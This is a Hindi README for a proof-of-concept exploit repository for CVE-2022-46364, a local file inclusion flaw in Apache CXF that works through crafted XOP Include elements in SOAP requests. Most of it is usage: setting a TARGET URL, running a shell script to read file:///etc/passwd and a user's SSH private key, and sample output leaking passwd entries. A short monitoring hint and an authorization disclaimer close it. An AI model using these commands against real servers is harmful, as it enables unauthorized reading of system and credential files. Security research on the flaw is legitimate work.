
CVE-2022-46364 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Apache CXF में SOAP अनुरोधों में निर्मित XOP Include तत्वों के माध्यम से एक स्थानीय फ़ाइल समावेशन भेद्यता, जो मनमानी फ़ाइल पढ़ने की अनुमति देती है।
इस रिपॉजिटरी में CVE-2022-46364 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Apache CXF में एक लोकल फ़ाइल इन्क्लूज़न (LFI) कमज़ोरी है।
यह कमज़ोरी SOAP अनुरोधों में XOP (XML-binary Optimized Packaging) Include तत्वों के अनुचित हैंडलिंग के कारण उत्पन्न होती है, जिससे हमलावर सर्वर से मनमानी फ़ाइलें पढ़ सकते हैं।
Apache CXF SOAP अनुरोधों के अंदर <xop:Include> तत्वों को अनुचित तरीके से प्रोसेस करता है।
एक गढ़ा हुआ href (जैसे, file:///etc/passwd) प्रदान करके, सर्वर स्थानीय फ़ाइल सामग्री को शामिल कर सकता है और वापस कर सकता है।
अपने लक्ष्य वातावरण में हमेशा सटीक कमज़ोर संस्करण सत्यापित करें।
<xop:Include href="file:///path/to/file"> शामिल करता है.
├── cxf_lfi.sh # एक्सप्लॉइट स्क्रिप्ट
├── README.md # दस्तावेज़ीकरण
├── LICENSE # MIT लाइसेंस
└── .gitignore
chmod +x cxf_lfi.sh
स्क्रिप्ट के अंदर लक्ष्य को अपडेट करें:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
कुछ सर्वर:
file:// स्कीमों को सैनिटाइज़ या ब्लॉक कर सकते हैंआउटपुट पार्सिंग प्रतिक्रिया प्रारूप पर निर्भर करता है और मैन्युअल निरीक्षण की आवश्यकता हो सकती है।
असामान्य SOAP अनुरोधों की निगरानी करें जिनमें शामिल हैं:
<xop:Include>file:// URIsयह प्रोजेक्ट इसके लिए है:
बिना स्पष्ट अनुमति के इस टूल का उपयोग सिस्टम पर न करें।
सुरक्षा अनुसंधान और CTF अभ्यास के भाग के रूप में विकसित किया गया।